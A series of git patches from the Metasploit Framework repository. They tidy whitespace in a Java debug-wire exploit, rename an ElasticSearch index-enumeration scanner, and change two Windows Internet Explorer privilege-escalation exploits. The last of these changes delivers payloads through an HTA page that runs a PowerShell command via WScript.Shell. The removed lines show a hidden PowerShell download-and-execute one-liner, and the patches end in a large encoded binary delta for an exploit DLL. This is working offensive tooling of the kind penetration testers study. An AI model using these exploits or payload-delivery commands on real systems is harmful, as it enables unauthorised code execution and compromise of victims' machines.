-554,7 +553,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Invokes a static method. The method must be member of the class type or one of its superclasses, + # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) @@ -579,7 +578,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Invokes a instance method. The method must be member of the object's type or one of its superclasses, + # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) @@ -631,7 +630,7 @@ class Metasploit3 < Msf::Exploit::Remote end - + def temp_path return nil unless datastore['TMP_PATH'] unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') @@ -643,11 +642,11 @@ class Metasploit3 < Msf::Exploit::Remote # Configures payload according to targeted architecture def setup_payload - + # 1. Setting up generic values. payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe - + # 2. Setting up arch specific... case target['Platform'] when 'linux' @@ -881,7 +880,7 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Prepares the payload payload_exe, pl_exe = setup_payload - + # 2. Creates file on server for dumping payload file = create_file(thread_id, payload_exe) @@ -906,20 +905,20 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - + @myid = 0x01 @vars = {} @classes = [] @methods = {} @os = nil - + check - + connect fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake - + # 1. Get the sizes of variably-sized data types in the target VM idsizes @@ -966,4 +965,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end \ No newline at end of file +end From 6f330ea19064c183c27d497f4dc9d0bc2287fdbc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:38:01 -0500 Subject: [PATCH 420/853] Add deprecation information --- .../scanner/elasticsearch/indeces_enum.rb | 6 ++ .../scanner/elasticsearch/indices_enum.rb | 89 +++++++++++++++++++ 2 files changed, 95 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/indices_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb index 196d77aec0..431593cf2c 100644 --- a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb @@ -4,6 +4,7 @@ ## require 'msf/core' +require 'msf/core/module/deprecated' class Metasploit3 < Msf::Auxiliary @@ -11,6 +12,11 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 07, 29) + DEPRECATION_REPLACEMENT = 'auxiliary/scanner/elasticsearch/indices_enum' + def initialize(info = {}) super(update_info(info, 'Name' => 'ElasticSearch Indices Enumeration Utility', diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb new file mode 100644 index 0000000000..196d77aec0 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -0,0 +1,89 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Indices Enumeration Utility', + 'Description' => %q{ + This module enumerates ElasticSearch Indices. It uses the REST API + in order to make it. + }, + 'Author' => + [ + 'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>' + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(9200) + ], self.class) + end + + def peer + "#{rhost}:#{rport}" + end + + def run_host(ip) + vprint_status("#{peer} - Querying indices...") + begin + res = send_request_raw({ + 'uri' => '/_aliases', + 'method' => 'GET', + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + vprint_error("#{peer} - Unable to establish connection") + return + end + + if res && res.code == 200 && res.body.length > 0 + begin + json_body = JSON.parse(res.body) + rescue JSON::ParserError + vprint_error("#{peer} - Unable to parse JSON") + return + end + else + vprint_error("#{peer} - Timeout or unexpected response...") + return + end + + report_service( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'elasticsearch' + ) + + indices = [] + + json_body.each do |index| + indices.push(index[0]) + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "elasticsearch.index", + :data => index[0], + :update => :unique_data + ) + end + + if indices.length > 0 + print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + end + + end + +end From 03889ed31f6e1f2e6d38353ffc3f4631ff7a64ea Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 18:11:22 -0500 Subject: [PATCH 421/853] Use cmd_psh_payload --- .../windows/local/ms13_097_ie_registry_symlink.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index cb5334af06..c0e1c9d897 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -98,20 +98,14 @@ class Metasploit3 < Msf::Exploit::Local def on_request_uri(cli, request) if request.uri =~ /\.hta$/ print_status("Sending hta...") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" - command = "powershell.exe -w hidden -nop -c #{download_and_run}" hta = <<-eos <script> -var command = "cmd.exe /c #{command}"; +var command = "#{cmd_psh_payload(payload.encoded).strip}"; var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.psh$/ - print_status("Sending psh payload...") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) elsif request.uri =~ /\.html$/ print_status("Sending window close html...") close_html = <<-eos From ffbcbe8cc1df1fb7d1a64de06c656b9e557327d0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 18:12:18 -0500 Subject: [PATCH 422/853] Use cmd_psh_payload --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index fd39ad0a0f..6b1193acfe 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -94,20 +94,15 @@ class Metasploit3 < Msf::Exploit::Local def on_request_uri(cli, request) if request.uri =~ /\.hta$/ print_status("Sending hta...") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" - command = "powershell.exe -w hidden -nop -c #{download_and_run}" hta = <<-eos <script> -var command = "cmd.exe /c #{command}"; +var command = "#{cmd_psh_payload(payload.encoded).strip}"; var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos + print_status(hta) send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.psh$/ - print_status("Sending psh payload...") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) else send_not_found(cli) end From 1dbd36a3dd424c67db01cda695fa74cf6270b671 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 09:02:43 -0500 Subject: [PATCH 423/853] Check for the .NET dfsvc and use %windir% --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 107520 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 8 ++++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index ef0eeb3a3c9cbd1739b993a8dc9bdad0a4fa6d05..cdfd0626b75c0d6fff30a5b9625536d432cbf51a 100755 GIT binary patch delta 20524 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 